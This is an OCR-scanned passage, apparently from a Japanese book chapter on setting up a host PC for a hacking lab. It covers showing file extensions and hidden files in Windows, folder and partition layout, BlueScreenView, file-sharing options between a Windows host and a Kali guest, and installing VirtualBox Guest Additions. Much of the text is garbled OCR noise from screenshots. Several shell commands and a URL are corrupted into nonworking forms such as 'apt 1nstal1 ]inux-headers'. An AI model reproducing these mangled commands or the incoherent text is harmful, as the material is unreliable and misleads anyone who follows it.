で きま せん 。 ま た 、!「 テ キス ト フ ァイル だ と 思い ダ プ ルク リッ ク し た ら 、 ウ イル ス 


の 実行 ファ イル で あっ た | と いう 事態 も 起こ し か ね ませ ん 。 そ の た め 、 フ ァイル 
の 拡張 子 を 表示 させ る よう に 設定 すべ き と い え 才 4 す 。 


ファ イル の 拡張 子 を 表示 する に は 、 次 の 手順 を し ます 。 


1 コン トロ ー ル パネ ル を 開く 

アイ コン 表 志 の コン トロ ー ル パネ ル を 開き ます 。Windows 7 / 81 で あれ ば 
| フォル ダー オプ ショ ン 」 を 選択 し ます 。 ま た 、Windows 10 で あれ ば 、| エ クス プ 
ロー ラー の オプ ショ ン 」 を 選択 し ます ( 図 3-1)。 


回 間 すべ て の コソ ント ロール パリ ネル) 


を ・ 本 市 : コン トロ - ル (ネル > すべ て の コッ トロ ー ル バネ ル 頂 中 


コフレ ュー ター の 選定 を 月 束 し ます 


an sih Plyyer ( 記 ata(U Graphcr and Medis 
sa Windpx Go 填 い ndgws モレ リエ ィ セッ ソ タ - 
ーー 計 ) 
芝 キュ リティ と メンテナ ソス 
「 思 トラ ルッ ュー ティ ソン 


A オン 


水 、 ユ - ザ - アカ ウッ ト 
同人 理 りー 
sd 3S 王 = 
埋 ミ “オブ 





図 3.1 Windows 10 の アイ コン 表示 の コン トロ ー ル パネ ル 


2) 拡 張子 を 表示 する 
| 表示 」 タブ に て 、 詳 細 設 定 の 中 か ら 「 登 録 さ れ て いる 拡張 子 は 表示 し な い 」 
いう 項目 の チェ ッ ク を 外し ます ( 図 3-2) 。 
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LOK」 ボタ ン で 設定 を 反映 させ ます 。 


エ ワ ス ブロ - ラ -0 メ プシ ョ / 
但 殻 家 示 棒 夫 
フォ 上 ル ダ ー の 去 示 


f この 家 志 方法 (詳細 家 示 や アイ コソ な お と) を この 生 雷 0 フォ ル ダ ー す べ て に 
則 語 用 すこ と が で きま す . 


ガル グー に 二 必 


ヒト に か コ 
(| ス 力 し た 到 日 を ュー で 朗 沢 する 
| ログ キン 際 に 以 級 の フォ ル ダ ー ウィ ソ ド ウ を 雪 示 すう 
| 是 語 化 や に 光 さ れ た NTFS ファ イル カラー で 家 示 する 
| 到 吉 フィ ザー ド を 芋 尾 すう | 答 琶 ) 
に 空 9 ド ミイ ブ は 表示 し な い 
| 短 涯 に ファ イル アイ コン を 和枝 示す る 
し 補 に アイ コン を まま テ し 、 感 小夏 は 表示 し な い 
し 令 に メニ ュー を きす る 


て いう る 区 久子 は 表地 し な | 


[| FE 本 ONE で し な ! 

同軸 プロ バイ ダー の 知 を 生 示 する 

し 別 の プロ セス で ブル ダー ウィ ンド う を 罰 く 

し] 昧 肝 され た オペ パ ルーティ ソ ヴ シス テム ファ イル を 主 記 し ちい ( 定 革 ) 


に 


蔽 定 催 に 戻す (DI 


キャ ソ セ ゼル 己 中 ん ) 





図 3.2 「 表 示 ]」 タブ 画面 


コマ ンド プロ ンプ ト の 実行 履歴 を 表示 する 


コマ ンド プロ ンプ ト 上 で [Fn7] キー を 押す と 、 過去 に 実行 し た コマ ンド の 一 覧 
が 表示 され ます 。[ 1] キー や [!] キー で 履歴 を 選ん で [Enter] キー を 押す こ 
と で 、 簡 単に コマ ンド を 実行 で きま す 。 こ の 実行 履歴 画面 を 前 じ る に は [ESC] 
キー を 押し ます 。 

し か し 、 こ の 方 法 に より コマ ンド を 再 実 行 す る こと は 簡単 で す が 、 コ マン ド の 
一 部 を 変更 し て 実行 する の は 難し いと いえ ます 。 代わ り に 、 doskey /h コ マン ド を 
実行 すれ ば 、 履 歴 を コピ ー 立 ペー スト で きま す 。 
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トレ 4 を と こし こと の 隠し 属性 を 


92 





Windows で は 重要 な 
は 隠し 属性 が 設定 され 
が 人 挙 げ ら れ ま す 。 


ファ イル を 諾 っ て 削除 し て し まわ な いよ うに 、 フ ァイル に 
て いる こと が あり ます 。 例え ば 、 次 の よう な ファ イル な と 


テス クト ッ フ 上 の "Desktop.ini" ファ イル 

これ は デス クト ッ プ アイ コン の 情報 な ど を 保持 し て いる ファ イル で す 。 
CUsers\Public\Desktop ( 全 ユ ー ザ ー 共 通 ) と CUsers\< く ユー ザー 名 
トー (ユー ザー 個別 ) の 2 つの フォ ル ダ ー に それ ぞ れ "Desktop.ni が 存在 
する ため 、 デ スク トッ プ に この ファ イル が 2 つ 表 示さ れ ま す 。 ど ちら の ファ イル も 
削除 し て は いけ ませ ん 


共有 フォ ル タ ダー の "Thumbs.db" ファ イル 
ェ ク ス プロ ー ラ ー で 画像 や 動画 ファ イル の サム ネイ ル を 表示 する た め の 情 報 を 
保持 し て いる ファ イル で す 。 


し か し 、 ハ ッ キ ング ・ ラ ボ を 構築 する に は 、 細 か い カ スタ マイ ズ を 必要 と し ま 
ま Xe 日 頃 か ら 隠 し re 。 イル を 表示 し * て お いた まま Windows を 操作 する っ 
で 、 隠 し ファ イル の 存在 を 意識 で き 、 目 然 に Windows シス テム の 知識 が 身 に つき 


そこ で 、 本書 で は 隠し ファ イル や 隠し フォ ル ダ ー を 表示 する よう に 設定 し ます 。 


エク スプ フ プロー ラー の オフ ショ ン を 表示 する 


1「 エク スプ ロー ラー の オプ ショ ン 」 を 表示 し ます 。 


2 隠し 属性 を 解除 する 

評 細 設定 の 中 か ら | 隠し レフ ァイル 、 隠 し フォル ダー、 お よび 隠し ドラ イブ を 表 
示す る 」 と いう 項目 に チェ ッ ク を 入れ ます 。 さらに 、 | 保護 され た オペ レー ショ ン 
ンス テム ファ イル を 表示 し な い 」 と いう 項目 の チェ ッ ク を 外し ます 。 

[OK] ボタ ン で 設定 を 反映 させ よう と する と 、 警 告 画面 が 表示 され ます が 、 そ 
の まま [はい ] ボタ ン を 押し て 反映 させ ます ( 図 3-3) 。 
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保護 され て いう オバ パレ ルーティ ング シス テム ファ イル (シス テム ファ イル お よび 隔 し ファ イル ) を エク スプ ロー ラー で 去 
示す る よう に 所 択 し まし た 。 


これ ら の ファ イル は Windows の 研 前 お よび げ 圭 行 に ぬ 革 で す - これ ら 5 の ファ イル が 削 造 よ た は 薫 生 され る と コ 
ッ ピ ュー ター が 肖 作 で き な く な う 可 能 性 が あり ます . 
これ ら ① フ ァイル を 表示 し よ す が 5? 





| BWO | 


3-3 芝 告 画面 


また 、Windows 10 の 場合 は 、 エ クス プロ ー ラ ー の 画面 か ら す ば や く 設 定 で きま 
す 。 エ クス プロ ー ラ ー の 「 表 示 」 タブ の 「 表 示 / 非 表 示 ]」 内 に ある 「 隠 し ファ イ 
ル 」 に チェ ッ ク を 人 入れ ます 。 す る と 、 隠 し レフ ァイル 属性 の ファ イル や フォ ル ダ ー 
が 表示 され ます ( 図 34)。 


了 人 本 連 朋 ロ - 連 ディ スグ (Ci 
管理 
nn 画 特大 アイ コソ 司 大 デイ コソ 回 中 アイ コソ SHT 国 ・ [ 基 目 チ ry ク 京 y2 ス り 
軒 | 本 みち - ウ ウト 2 衣 ひ ァ イコ ッ BE 一覧 還 村 還 、m・ ロア イル を gg 各 = 四 
ナビ ザー ソン ョ ソ [1 当 計 詩 フ ィ ン ドウ ま に て 雪 盾 で ョ し 1 kb た 1 1 = = アー 
ウィドウ ・ 秋 べ Y 雪 示 還 コッ テッ " 功 | 較 馳 アイ ル cz キリ シル ( 上 ネ 
バイ ソ ルイ 7 ウト 現在 の ビュー 


ー > 全品 > PC > ロー カルテ ィ ス ケ (CI y ひ | 日 - カ ル ティ スケ (C) 加 栓 索 


更 若 明 末 衝 知 
時 クイ ッ ク アク セス 


画 | メッ トッ ブ 2018POEOG 2347 フェ イル ユ ォ ル ダ ー 
まめ >0- ド 1 の ァ ル だ り (に コリ 
誠 ドキ ュ メ ツ ト 1 gm 加 ノア イル や フォ ル ダ ー 


居 ] ビク チャ roqram Hiles (8fl が 表示 さ れ FE ミ す O 
| 55 20171 リ 14 27 ブイ ル フォ ル ダ - 
| wino 2D1B/DEJDB 1 イル コ ォ ル ダ ー 
賠 ビ ィ 2018/O6O1 1&57 フィ イル フォ ル ダ - 
201VUOErU6 の フ r イ 上 ル フォ ル ダ ー 


ミュ ー ジ ィ ク 
の 201 が VO5/29 1 な 38 が イル ナル ダー 
但 。 OncDrmye 


( 選 PC 
時 ネッ > トワーク 
= あ - 上 ムリ ー ブ 





10 居 器 誠 旦 


図 3-4 隠し ファ イル を 表示 する 
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mb アコ ョ ピコ の ム を る |) 
すぐ に 開け る よう に する 


Windows 10 の デフ ォ ル ト 状 態 


症 
半 
3 
町 
| 
症 
症 
| 4 
凍 





6 
ー 
L1 
se 

ー~ 
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ャ ー 
we 
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つ ツ 
てこ 
pu 
HH 
| 
ココ 

っ と 
あい 
ぐ 
に デメ 
I 

JH 
= 式 
反 1 
ぐふ 


4 アーノ ーー 人 ii ク 、 = 
多く 、 手 間 が か か り ま す 。 そこ 


お すす めし ます 。 


1 コン トロ ー ル バネ ル を 開く 
検索 欄 に | コント ロー ル パ ネ ル 」 と 入力 し て 、 コ ント ロー ル パ ネ ル を 開き ます 


2) タ スク バー に 登録 する 


コン トロ ー ル パネ ル を 開い 3 タス ク バ パー の アイ コン を 右 グ クリ ッ ク し て 
[タスクバー に ヒビ ピン 留め する 」 を 選び ます ( 図 3.5) 


Windows の 機能 の 有効 化 また は 舞 効 化 


リア と ゴ パ 


に 1 円 | 所! を き 『 


ャ アン ルコ ロ だ 1 た た 


ウィ ンド ウ を 閉じ る 
加 庄 


図 3.5 タス ク バ パー に ピン 留め 





する と 、 タ スク バー に コン トロ ー ル パネ ル が 登録 され 、 ア イコ ン を 押す だ け で 


開け る よう に な り ま す 。 な お 、 こ の 方 法 は 他 の アプ リ に も 適用 で きま す 
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3.4| スタ ー ト メニ ュー の 主要 リン ク を 


: カス タマ イス する 


Windows 10 で は 、 ス ター トメ ニュ ー の 左 ペ イン に | 設定 ]」 な どの 主要 リン ク が 
表示 され て いま す 。 こ こ に よく 使う [エク スプ ローラ ー」 や 「 ネ ットワーク 」 な 
ど を 追加 で きま す 。 





1 個人 用 設定 を 開く 
設定 画面 に て 、 個 人 用 設定 を 選び ます 


2) ス ター ト 画 面 の 主要 リン ク 設 定 画 面 を 開く 
| 個人 用 設定 ] の | スター ト 」 を 選び 、| スタ ー ト に 表示 する フォ ル ダ ー を 選ぶ 」 
リン ク を 直 し ます 。 


3 主要 リン ク に する も の を 選択 する 
E 要 リン ク の 切り 准 え スイ ッ チ が 表示 され る の で 、 表 示し 】 た いも の を オン に | 


ます 。 こ こ で は 、 追加 で 1! ドキュ メン ト 」| ダ ウン ロー ド 」 |「 ネ ットワーク 」 | エク 
くん プ ロー ラー」 を オン に し まし た 


スタ ー ト メニ ュー に 表示 され る こと を 確認 する 
スタ ー ト メニ ュー の 左 ペ イン に 表示 され る 


こと を 確認 し ます ( 図 3.6)。 





図 3.6 主要 リン ク が 変更 され た 
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3-5 | メイ ン PC の フォ ル タ ダー 構成 を 考え る 





光 イン スト ー ル フォ ル ダ 間 ee 


イィ インストー ラー 型 の アプ リ は 、 通 常 C:\Program Files や C:\Program Files 
(x86) に イン スト ー ル され ます 。 
方 、 展 開 す る だ け で 済む せよ うな アプ リ の 場合 、 ア プリ を 保存 する フォ ル ダ ー 
を 決め て お か な いと 燃 雑 に な っ て し まい ます 。 例え ば 、C:\App 、C\Bin な ど 
の フォ ル ダ ー を 作っ て お き 、 そ こ に 展開 後 の フ ォ ル ダー を 配置 し ます ( 図 37)。 こ 
うし て お く こ と で 、 ア ン イ ンス トー ル し た り 、 パー ジョ ン ア ッ プ し た りす る ゐる 際 に 、 
アプ リ の 場所 を 探す 手間 が 省け ます 。 


」.r コン ビュー ター , Windows7_OS (C:) ! App > 
| ファ イル MF) 往生 (E) 表示 (V) ツー ル LT) ヘル プ (P) 
生理 ライ ブラ リ に 所 加 < 革 且 マ 書き 込む 新しい フォ ル ダ ー 
編 。 Windows7_05S (C:) ^| る る 請 3 
$RecyCle.Bin 
」*WINDOWS.-BT 


MM AGDRec_131F 

中 ar で H102 

。 SWindows. WS 』 Dintext303 

、 ApP Ma Doomerang-Win32-qalpha-1.3.1 
ADD2 上 Bz162 

| backup | 5 Tool 

、Book Comae- Toolkit-Light-3.0.20180528.1 

| CTroCkeT COnVETsion tools 

DIE_1.01_wn 

| dnSPy 

exifool-10.98 

fesmw17160 

FesLCopy330 x64 


Fuxit 


Dooumecnts and Settings 
。DOS 
、Dowmiogd 
| DRIVERS 


まお 
ま 
ま 
「 
ま 
し 
に onhg.Msi 
回. 
ま 
ま 
ま 
ま 


」 edipse 


1 57 民 の 天目 
且 





57 伯 の 項目 ニニ ニー ニニ = 1 詳 コ くら ニニ ター 


図 3-7 App フ ォ ル ダー の 例 


シス テム と デー タ 用 の パー ティ ショ ン に 分 割 す る 
RE 
す 。 その た め 、 ク ラッ シュ し や すい 状態 と いえ ます 。 シス テム と デー タ を 同じ パー 
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ティ ショ ン 内 に 保存 する と 、 シ ステ ム が クラ ッシュ し た と き に 、 デ ー タ る 巻き 込 
まれ る 恐れ が あり ます 。 

Windows 10 で は 、 簡 単に パー ティ ショ ン を 分 割 ・ 修 正 で きる よう に な り ま し 
た 。 可能 で あれ ば 、 シ ステ ム と デー タ 用 の パー ティ ショ ン は 分 け て お く こ と が 望 
まし いと いえ ます 。 例え ば 、 デ ー タ 側 の パー ティ ショ ン に は 、 デ ー タ 保存 の フォ 
ル ダ ー ("1)、 仮 想 マ シン 、Dropbox の フォ ル ダ ー な ど を 配置 し ます 。 


BlueScreenView を 活用 する 


Windows で は プル ー ス クリ ー ン で 強制 炎 子 する と き に クラ ッシュ 情報 を 収め た 
ダン プ フ ァ イ ル を 生成 する よう に 設定 で きま す 。 こ の ダン プ フ ァ イ ル を Blue 
ScreenView に 読み 込ま せる こと で 、 そ の ブル ー ス クリ ー ン 画面 を 再現 で きま す 。 


Blue screen of death (STOP error) information in dump files. 
http : / /www . n1rsof†t . net/utils/blue screen_view . html 


特に プ ブルー スクリーン の 再現 方 法 が わか っ て いな いと き に 有効 と いえ ます 。 プ 
ルー スク リー ン が 発生 し た タイ ミン グ に その 場 に いな く て も 、 後 で プル ー ス ク 
リー ン 画 面 を 確認 し て 重要 な メッ セー ジ あ る い は キー ワー ド を 見 つけ 出せ ます 。 

より 詳細 な 調査 が 必要 な 場合 に は 、WinDbg な どの デバ パッ ガー で ダン プ フ ァ イ 
ル を 解析 し ます 。 


*1 : マイ ドキ ュ メ ント を 別 の パー ティ ショ ン 、 す な わ ち C ド ライ ブ 以 外 に 配置 する 場合 、 マ イド 
キュ メン ト の プロ パテ ィ に て パス を 修正 し ます 。 
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3-6 | アシ さ e に イン ルン 6 に 3gc 


: ファ イル を や り 取 りす る 


人 復 数 の OS を 管理 し て いる 場合 、 そ の 間 で ファ イル の や り 了 取り を し た い 場 面 が た 
び た び あり ます 。 こ うし た 場面 は 、 仮想 環境 の 運用 に お いて も 同様 に 存在 し ます 。 
だ ト OS (Windows 10) と ゲス ト OS (Kali) 聞 で ファ イル の や り 取 





凛 ファ イル サー バー を 利用 する 

最も 素朴 な アプ ロー チ は 、 フ ァイル サー バー を 構築 する と いう 方 法 で す 。 フ ァ 
イル サ ー バ ー は 常時 稼働 させ て お き 、 デ ー タ を 事前 に アッ プロ ー ド し 、 そ の デー 
タ を 必要 と する PC で ダウ ン ロ ー ド し ます 。 


メリ ッ ト 

* OS の 種類 、 仮想 環境 の 有無 に 依存 し な い 。Windows、 Linux、 macOS、Android 
な ど 、 あ ら ゆ る PC が 混在 し て いて も 問題 に な ら な い 。 

4 フォ ル グ ー と し て マウ ント で きる よう に 拉 し て で おり ょ り 科 単に デー 
タ を 扱え る 。 例え ば 、Windows 側 に て テキ スト エディ ター で ファ イル を 開き つ 


うっ 、Kali 側 に て その ファ イル で コン パイ ル や 


実行 る 。 aa Windows 専 
用 の テキ スト エディ ター を 使用 し た い 場 合 に 有効 


と いえ る 。 


テ メ リ ッ ト 
・ フ ァイル の や り 取 り 時 に ファ イル サー バー が 稼働 し て いな けれ ば な ら な い 。 例 
ば ざ 、 出 先 に ノー ト PC を 持ち 出し た と する ("2)。 ノ ー ト PC 内 で 、 ホ スト OS 
と ゲス ト OS で デー タ を や り 取 り し た く て も 、 フ ァイル サー バー が 存在 し な い の 
で この アプ ロー チ で は 対応 で き な い 。 

* フ ァイル サー バー を 構築 する 手間 が か か る 。 フ ァイル サー バー 上 で 稼働 する OS 
を イン ス ys す ファ イル サー バー と し て 動作 する た め の ソ フト ウェ ア の 設 
定 が 必要 。 例え ば 、 フ ァイル サー バー と し て Raspberry Pi を 選択 し 、OS 
っ き の ーー OS を 、 ソ フト ウェ ア と し て Samba を イン スト ー ル する (た だ 


2: イ ンタ ーネット に 接続 され て いれ ば 、VPN な ど を 活用 する こと で 解決 で きま す 。 た だ し 、 
VPN の 設定 な ど の 手間 が か か り ま す 。 
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し 、NAS を ファ イル サー バー と し て 活用 する 場合 に は 、 そ うい っ た 手間 は 最小 
限 で 済む )。 


光 ゲス ト OS で FTP サー ビス を 有効 に する 


2 つ 目 の アプ ロー チ と し て 、 ゲ スト OS で ある Kalii に て 、FTP サ ービス を 株 働 さ 
せま す 。 そ し て 、 ホ スト OS で ある Windows で FTP ク ライ アン ト を 用 いて 、Kali 
と デー タ を や り 取 り し ます 。 


メリ ッ ト 
* 余分 な サー バー を 構築 せ ず 、 通 信 元 と 通信 先 だ け で 完結 する 。 


デメ リッ ト 

・ 通信 元 と 通信 先 の どちら か で FTP サ ービス を 有効 に し な けれ ば な ら な い 。 運用 
する ゲス ト OS が 増え る ほど 、FTP サ ービス を 稼働 させ る 作業 を 何 度 も 繰り 返 
すこ と に な る 。 

*・ ゲ スト OS 間 で デー タ を や り 取 りす る 際 に は 、 そ の ゲス ト OS 同士 が 同一 ネッ ト 
ワー ク に 属さ な けれ ば な ら な い 。 ホ スト OS を 介する と いう 方 法 で 回 避 で きる 
が 、 デ ー タ の や り 取 り が 2 度 必要 に な っ て し まう 。 

s ファ イル の 二 重 管理 (場合 に よっ て は それ 以上 ) に な っ て し まう 。 

・ ゲ スト OS の 容量 に 制限 され る 。 


誠 Windows の ファ イル 共有 機能 を 利用 する 

3 つ 目 の アプ ロー チ を 考え ます 。 ホ スト OS で FTP サ ービス を 有効 に する こと 
で 、 ゲ スト OS ご と に FTP サ ービス を 有効 に する と いう 手間 は 解決 し ます 。 と ころ 
が 、 ホ スト OS が Windows で あれ ば 、FTP サ ービス を 有効 に せ ず と も 、Windows 
の ファ イル 共有 機能 を 活用 で きま す 。 例え ば 、'C:\share と いう 共有 フォ ル ダ ー 
を 作成 し ます ("3)。 


メリ ッ ト 
・ ホ スト OS を 開発 環境 、 ゲ スト OS を 実行 環境 と いう 使い 分 けが で きる 。 仮想 マ 


3:38 の 「 メ イン PC の 共有 設定 を 見 直す 」 を 参照 し て くだ さい 。 





| 第 3 章 | ホス ト OS の 基本 設定 149 


シン を 起動 し な く て も 、 好 き な テ キス ト エ ディ ター を 用 いて プロ グラ ミン グ で 
きる 。 コ ン パ イル や 実行 の 際 に 仮想 マシ ン を 起動 する 。 
* ファ イル の 二 重 管理 が 起こ ら な い 。 


デメ リッ ト 
s 共有 フォ ル ダ ー を マウ ント する 際 に 、Windows の パス ワー ド を 指定 する 必要 が 
ある 。 


交 VirtualBox の ファ イル 共有 機能 を 利用 する 

4 つ 目 の アプ ロー ナチ を 考え ます 。 VirtualBox Guest Additions (Guest Additions 
と 略す ) と は 、VirtualBox の 操作 性 を 向上 する よう に 設計 され た アプ リ ケ ー シ ョ 
ン で す 。VirtualBox か ら 公式 アプ リ と し て 提供 され て いま す 。 こ れ を 用 いる こと 
で 、VirtualBox で ファ イル 共有 を 実現 で きま す 。 


メリ ッ ト 
最も 簡単 に 実現 で き る 。 
* ファ イル の 二 重 管理 が 起こ ら な い 。 


デメ リッ ト 

* VirtualBox に 特 化 し た 機能 で ある た め 、 VirtualBox と 独立 の 関係 に ある PC と は 
ファ イル 共有 で き な い 。 一 例 と し て 、 仮 想 環境 を 構成 する 1 台 の マシ ン 内 で は 
ファ イル を 共有 で きる が 、 物 理 的 に 別 の マシ ン に 対し て は 共有 で き な い 。 例え 
ば 、 ノ ー ト PC と Raspberry Pi の 間 で は 別 の アプ ロー チ を 採用 する し か な い 。 


消 VirtualBox の ドラ ッ グ & ド ロッ プ 機 能 を 利用 する 


5 つ 目 の アプ ロー チ も 、Guest Additions を ゲス ト OS に 適用 し ます 。 こ れ に より 
ホス ト OS と ゲス ト OS 間 で ドラ ッ グ 層 ド ロッ プ を 実現 で きま す 。 


メリ ッ ト 
s 共有 フォ ル ダ ー を 介さ ず に 、 直 接 ホ スト OS と ゲス ト OS 間 で 、 マ ウス 操作 だ け 
で ファ イル を ドラ ッ グ 錠 ドロ ッ プ で きる 。 
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デメ リッ ト 
* VirtualBox に 特 化 し た 機能 で ある た め 、 VirtualBox と 独立 の 関係 に ある PC と は 
ファ イル を や り 取 り で き な い 。 


氷 まとめ 


ここ で は 代表 的 な アプ ロー チ を 紹介 し た に 過ぎ ませ ん 。 そ の 他 の アプ ロー チ も 
存在 し ます 。 ま た 、 紹介 し た アプ ロー チ も それ ぞ れ 一 長 一 短 が あり ます 。 そ こ で 、 
本 書 で は 表 3-1 の 3 つの アプ ロー チ を 採用 し ます 。 


表 3-1 本 害 の アプ ロー チ 


電 |z25- ち っ 
③ |WAS で ファ イル サー バー を 各 有 する 。。。 |92 
|② | Vrwaox の ファ イル 共和 有利 用 する |37 


仮想 環境 内 で あれ ば ② で カバ ー し 、 そ う で な けれ ば ゆ と ③ で カバ ー し ます 。 










タス クマ ネー ジャ ー で プロ グラ ム の 種類 を 識別 する 


Windows の プロ グラ ム の 動作 状況 を 確認 する に は 、 タ スク マネ ー ジ ャ ー を 使用 
し ます 。 タ スク マネ ー ジ ャ ー で は CPU、 メ モリ 、 ネ ットワーク に つい て の 簡易 的 
な 使用 状況 を 確認 で きま す 。 さ ら に 詳し い 情 報 を リア ル タ イ ム に 知り た い 場 合 に 
は 、 リ ソー スモ ニタ ー を 用 いま す 。 

64 ビ ッ ト 版 の Windows の タス クマ ネー ジャ ー の 「 プ ロ セ ス 」 タプ に て 、 実 行 
ファ イル 名 の 後に |「*32] と 付い て いれ ば 32 ビ ッ ト 版 プロ グラ ム で あり 、 付い て い 
な けれ ば 64 ビ ッ ト 版 プロ グラ ム と 識別 で きま す 。 
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3-7 | VirtualBox の ファ イル 共有 機能 を 





| 利用 する 


ホス ト OS と ゲス ト OS 間 の ファ イル な どの や り 取 り を 円 滑 に する た め に 、 こ こ 
で 解説 する 設定 を 施し ます 。 


交 ホス ト OS の 設定 


ホス ト OS の Windows で 、 次 の 設定 を 行い ます 。 


1 共有 用 の フォ ル ダ ー を 作成 する 

C: ぎ share フォ ル ダ ー を 作成 し 、 中 に 適当 な ファ イル を 置き ます 。 ここ で は ファ 
イル の 中 上 身 を 表示 で きる こと を 確認 する た め に 、Ssample.txt ファ イル を 作成 し 、 
内 容 に 任意 の 文字 列 を 入力 し ます 。 


2 共有 フォ ル ダ ー の 設定 を 行う 
VirtualBox の 設定 画面 に て 、「 共 有 フ ォ ル ダー」 を 選択 し ます 。 右側 の プラ ス ア 
イコ ン を 押し て 、 追 加 し ます 。 こ こ で は 表 3.2 の よう に 指定 し ます 。 


表 3.2 共有 フォ ル ダ ー の 設 


共有 フォル ダー 名 
上 誠 CesC の 9 


パス 





読み 込み 専用 に チェ ッ ク を 入れ な いこ と で 、 ア クセ ス 権 が 完全 に な り ま す 。 ま 
た 、 目 動 マ ウン ト に する こと で 、 ゲ スト OS で は ツ /media/sf < 共有 フォ ル ダ ー 
名 >" デ ィ レ クト リ が 現れ ます (55)。 


4: C:\share フォ ル ダ ー は 、Windows の 共有 フォ ル ダ ー 機 能 で も 利用 する こと を 想定 し て 、 汎 
用 的 な 名 前 に し まし た 

5 : この ディ レク トリ が 現れ な い 場 合 は 、Guest Additions が イン スト ー ル され て いな い 可 能 性 が 
あり ます 
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輝 ゲス ト OS に Guest Additions を 適用 する 


ゲス ト OS の Kali で 、 次 の 操作 を 行い ます 。 


1 仮想 マシ ン の Kali を 起動 する 


仮想 マシ ン の Kali を 起動 し ます 。 
ダー 機能 を 有効 に し て いる の で 、 下 に 共有 フォ ル ダ ー の アイ コン が 表示 され て い 


0 の 時 に ーー ンズ 仮 想 マ ン nr 」 と 間 を 容 は 共 有 7 。 沈 ル 


すず 選 て 


ます ( 図 38)。 


② め 電 mW ウ g 呈 @2】 臣 Right Control 


share: し : お hare 


図 3-.8 共有 フォ ル ダ ー の 有効 化 を 示す アイ コン 





2)Guest Additions を 適用 する 準備 を する 


次 の コマ ンド を 入力 し て 、Guest Additions を 適用 する 進 備 を し ます 。 


POOt 人 Qka11:< 韻 apt update -y 
PootQka11:< 韻 apt 1nstal1 ]inux-headers-$(uname -r) 


3Guest Additions を イン スト ー ル する 

仮想 マシ ン の メニ ュー の | デバ イス 」 > TGuest Additions CD イメ ー ジ の 挿入 」 
を 選択 し ます 。 

数 秒 経つ と 、 デ スク トッ プ に CD の アイ コン が 表示 され 、 同 時 に 「 自 動 起動 する 
か 」 と いう 確認 ダイ アロ グ が 表示 され る の で 、[Cancell ボタ ン を 押し ます ( 図 


う -9) 。 
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較 Ki-Unux-2018.2 (54bi0 | 実行 宇 | - Orscle VM VirtJalBox 
デイル 仮 現 マジ ツ 委 示 入力 デル イス へ A 史 ブ 


"VBox_GAs_5.2.12" contains software intended to 
be automatically started. WVould you ike to run 填 ? 


『 you Gont Tust thl5 locatlon Or arent SUre. Pfes5 CanceL 





ひつ 和 放 み ョ ウリ 思 は ②⑫ | Hghl Cgntral 
図 3.9 確認 ダイ アロ グ 


CD アイ コン を 右 ク リッ ク し て 1Open」 を 選択 し ます 。 Files が 起動 する の で 、 中 
邊 の ファ イル を すべ て コロ モー し ます 。 そし て 、 デ スケ トッ プ を に Ybog プ ォ ル グ ダー 
を 作成 し 、 そ の 中 に ペー スト し ます 。 

その 後 、Files の 左 メ ニュ ー か ら Guest Additions の 右側 の 上 矢印 の アイ コン を 
し で 、 デ ンマ ウシ ント も し まず すず 。 

Terminal を 起動 し て か ら 、 次 の コマ ンド を 実行 し ます 。chmod コマ ンド で イン 
スト ー ル 用 の スク リプ ト に 実行 権限 を 号 え て か ら 実 行 し て いま す 。 


Footkal1:<# cd </Desktop/vbox 
Poot 仙 ka11 : </Desktop/vbox# chmod +x VBoxLinuxAdd ュ tons . Fun 


Foot 貼 ka11 :>/Desktop/vbox# sh ./VBoxL1nuxAdd ュ tons . run 
(途中 で Yes と 答え る ) 
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④)vbox フォ ル ダ ー を 削除 する 
イン スト ー ル 後 は 、"vbox" フ ォ ル ダー は 不要 な の で 、 削 除 し ます 。 





⑤)Kali を 再起 動 す る 
Kali を 再起 動 し ます 。 





⑥)Guest Additions が 適用 され た こと を 確認 する 

再起 動 後 、 共有 フォ ル ダ ー は 自動 的 に マウ ント され る の で 、 デ スク トッ プ に "sf_ 
share の アイ コン が 表示 され て いま す 。 た だ し 、 この 上 矢印 の アイ コン は アン マウ 
ント を 指示 する も の な の で 、 押 さき ない で お きま す 。 

また 、Files を 起動 する と 、 左 メニ ュー に "sf_share" が 現れ ます 。 


沙 ゲス ト OS で 共有 フォ ル ダ ー に アフ セス す る 

ゲス ト OS の Kali で 、 次 の 操作 を 行い ます 。 

/media'" の 中 を 確認 し ます 。 こ の 中 に "sf_share" が 存在 すれ ば 、 これ が 共有 フォ 
ル ダ ー に な り ま す 。 ま た 、cat コ マン ド で 共有 フォ ル ダ ー 内 の テキ スト ファ イル を 
表示 で きる こと も る 確認 し ます 。 





実 の と ころ 、 こ の フォ ル ダ ー に アク セス する に は root 権 限 が 必要 で す 。Kali で 
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は すでに root 権 限 で ログ イン し て いる の で 、 フ ァイル に アク セス で きた わけ で す 。 
し か し 、 ユ ー ザ ー 権 限 で ログ イン し て いる 場合 に は 、 表 示 で きま せん 。 そ の 際 
は 、sudo コマ ンド な ど を 使っ て 、 ア クセ モス し ます ("6)。 


消 マウ ント ポイ ント を 別に 作成 する 

Windows に 外部 メデ ィ ア ( 例 : DVD-ROM、USB メ モリ ー) を 接続 する と 、 内 
蔵 デ ィ ス ク と は 別 の ドラ イブ と し て 扱わ れ 、「E:] な どの ドラ イブ プレ ター が 割り 当 
て られ ます 。 

一 方 、 Linux で は 、 す べ て の ファ イル や ディ レク トリ が ルー トディ レク トリ 以下 
の どこ か に 配置 され る と 説明 し まし た 。 そ の た め 、Linux で 外部 メデ ィ ア を 使う に 
は 、 シ ステ ム で 認識 し て いる 外部 メデ ィ ア を 、 ル ー ト ディ レク トリ 以下 の どこ か 
の ディ レク トリ に つなげ な けれ ば な り ま せん 。 こ れ を マウ ント と いい 、mount コ 
マン ド で 実現 で きま す 。 

共有 フォ ル ダ ー ("/media/sf < 共有 フォ ル ダ ー 名 >") を "/share' に マウ ント す 
る に は 、 次 の 探 作 を 行い ます 。 


1①) マ ウン ト ボ イン ト を 作成 する 
Kali 上 に 共有 フォ ル ダ ー と し て "/share" を 作成 し ます (7)。 こ れ が マウ ント 先 
の ディ レク トリ に な り 、 マ ウン ト ポ イ ント と いい ます 。 


PootQka11:<# mkdir /share 


*6 : Ubuntu で は 次 の コマ ンド に より 、root 権 限 で ファ イル マネ ー ジ ャ ー (nautilns) を 起動 で き 
ます 。 


$ sudo nautilus 
また 、Lubuntu で は root 権 限 で ファ イル マネ ー ジ ャ ー (PCManFM) を 起動 で きま す 。 


$ gksudo pcmanfm 


7 :root 以外 で も アク セス で きる 設定 が この 先 に 控え て いる の で 、 あ えて "root' 配下 に は 作り ま 
せん で し た 。 
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② マ ウン ト す る 
次 の よう な 書式 で マウ ント で きま す 。 





